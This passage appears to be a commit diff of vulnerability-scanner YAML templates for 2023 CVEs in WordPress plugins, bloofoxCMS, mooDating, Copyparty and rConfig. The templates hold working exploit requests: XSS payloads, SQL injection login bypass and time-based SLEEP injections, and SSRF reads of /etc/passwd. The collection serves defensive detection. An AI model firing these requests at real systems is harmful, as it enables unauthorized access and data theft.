The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
reference:
- https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c
- https://nvd.nist.gov/vuln/detail/CVE-2023-27922
metadata:
max-request: 1
verified: true
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "text/html")'
- 'contains(tolower(body_2), "_newsletter_")'
- 'contains(body_2, "><script>alert(document_domain)</script>")'
condition: and

54
http/cves/2023/CVE-2023-29439.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2023-29439
info:
name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
reference:
- https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve
- https://wordpress.org/plugins/foogallery/
- https://nvd.nist.gov/vuln/detail/CVE-2023-29439
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-29439
cwe-id: CWE-79
metadata:
verified: "true"
publicwww-query: "/wp-content/plugins/foogallery/"
max-request: 2
tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'data-gallery_id="\"><script>alert(document.domain)</script>"'
- 'foogallery-image-edit-modal'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

44
http/cves/2023/CVE-2023-30868.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-30868
info:
name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
reference:
- https://www.exploit-db.com/exploits/51507
- https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014
- https://nvd.nist.gov/vuln/detail/CVE-2023-30868
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2023-30868
cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,wp,wordpress,wpscan,authenticated,exploitdb
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")'
- 'status_code_2 == 200'
condition: and

43
http/cves/2023/CVE-2023-3219.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2023-3219
info:
name: EventON Lite < 2.1.2 - Arbitrary File Download
author: r3Y3r53
severity: medium
description: |
The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors
to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
remediation: Fixed in version 2.1.2
reference:
- https://wpscan.com/vulnerability/72d80887-0270-4987-9739-95b1a178c1fd
- https://nvd.nist.gov/vuln/detail/CVE-2023-3219
- https://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
- https://wordpress.org/plugins/eventon-lite/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/eventon-lite/"
tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "BEGIN:VCALENDAR"
- "END:VCALENDAR"
condition: and
- type: word
part: header
words:
- "text/Calendar"
- type: status
status:
- 200

41
http/cves/2023/CVE-2023-33584.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2023-33584
info:
name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
author: r3Y3r53
severity: critical
description: |
Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
reference:
- https://www.exploit-db.com/exploits/51501
- https://nvd.nist.gov/vuln/detail/CVE-2023-33584
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-33584
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2023,sqli,exploitdb,unauth,enrollment
http:
- raw:
- |
POST /enrollment/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username='+or+1%3D1+%23&password={{randstr}}
- |
GET /enrollment/index.php?page=home HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and

49
http/cves/2023/CVE-2023-34751.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2023-34751
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34751
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34751
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and

49
http/cves/2023/CVE-2023-34752.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2023-34752
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34752
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34752
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and

49
http/cves/2023/CVE-2023-34753.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2023-34753
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34753
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34753
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and

49
http/cves/2023/CVE-2023-34755.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2023-34755
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34755
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34755
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=user&action=edit HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and

50
http/cves/2023/CVE-2023-34756.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2023-34756
info:
name: Bloofox v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
reference:
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://www.bloofox.com
- https://nvd.nist.gov/vuln/detail/CVE-2023-34756
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34756
cwe-id: CWE-89
metadata:
verified: true
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "text/html")
- contains(body_2, 'Admincenter')
condition: and

32
http/cves/2023/CVE-2023-36306.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-36306
info:
name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
reference:
- https://www.exploit-db.com/exploits/51643
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36306
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
http:
- method: GET
path:
- "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "Adiscon LogAnalyzer")'
condition: and

49
http/cves/2023/CVE-2023-37979.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2023-37979
info:
name: Ninja Forms < 3.6.26 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
remediation: Fixed in version 3.6.26
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-37979
- https://wpscan.com/vulnerability/3c7c65e9-c4fd-4d98-ae16-77abffbf7348
- https://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37979
cwe-id: CWE-79
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/ninja-forms/"
tags: cve,cve2023,xss,wordpress,wpscan,authenticated,wp-plugin,wp
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<img src=onerror=alert(document.domain)>") && contains(body_2, "import_form_template")'
- 'status_code_2 == 200'
condition: and

31
http/cves/2023/CVE-2023-3843.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2023-3843
info:
name: mooDating 1.2 - Cross-site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
reference:
- https://www.exploit-db.com/exploits/51628
- https://nvd.nist.gov/vuln/detail/CVE-2023-3843
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3843
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,exploitdb,moodating
http:
- method: GET
path:
- "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains(body, "><img src=a onerror=alert(document.domain)>w71ch") && contains(body, "mooDating")'
condition: and

32
http/cves/2023/CVE-2023-3844.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-3844
info:
name: MooDating 1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3844
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3844
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>r5c3m", "mooDating")'
condition: and

32
http/cves/2023/CVE-2023-3845.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-3845
info:
name: MooDating 1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3845
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3845
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
condition: and

32
http/cves/2023/CVE-2023-3846.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-3846
info:
name: MooDating 1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3846
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3846
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
condition: and

32
http/cves/2023/CVE-2023-3847.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-3847
info:
name: MooDating 1.2 - Cross-Site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3847
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3847
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>","mooDating")'
condition: and

32
http/cves/2023/CVE-2023-3848.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-3848
info:
name: MooDating 1.2 - Cross-site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3848
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3848
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- '{{BaseURL}}/users/viewi1omd"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity'
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "mooDating")'
condition: and

31
http/cves/2023/CVE-2023-3849.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2023-3849
info:
name: mooDating 1.2 - Cross-site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3849
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3849
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,moodating
http:
- method: GET
path:
- '{{BaseURL}}/find-a-matchpksyk"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?'
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains(body, "><img src=a onerror=alert(document.cookie)>s9a64") && contains(body, "mooDating")'
condition: and

40
http/cves/2023/CVE-2023-38501.yaml
View File

@ -1,53 +1,35 @@
id: CVE-2023-38501
info:
name: Copyparty v1.8.6 - Cross-Site Scripting
author: ctflearner
name: CopyParty v1.8.6 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
remediation: Upgrade to the latest version to mitigate this vulnerability.
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
remediation: Fixed in v1.8.6
reference:
- https://www.exploit-db.com/exploits/51635
- https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
- https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh
- https://github.com/9001/copyparty/releases/tag/v1.8.6
- https://nvd.nist.gov/vuln/detail/CVE-2023-38501
- http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38501
cwe-id: CWE-79
epss-score: 0.00282
epss-percentile: 0.64883
cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: copyparty_project
product: copyparty
shodan-query: title:"copyparty"
tags: packetstorm,copyparty,cve,cve2023,xss
tags: cve,cve2023,copyparty,xss,oss
http:
- method: GET
path:
- "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=copyparty onerror=alert(document.domain)>'
- 'go to /'
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

58
http/cves/2023/CVE-2023-39108.yaml Normal file
View File

@ -0,0 +1,58 @@
id: CVE-2023-39108
info:
name: rConfig 3.9.4 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-39108
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-39108
cwe-id: CWE-918
metadata:
max-request: 1
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "rConfig"
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: status
part: header_3
status:
- 200

57
http/cves/2023/CVE-2023-39109.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2023-39109
info:
name: rConfig 3.9.4 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-39109
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-39109
cwe-id: CWE-918
metadata:
verified: true
shodan-query: http.title:"rConfig"
max-request: 1
tags: cve,cve2023,rconfig,authenticated,ssrf,lfi
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
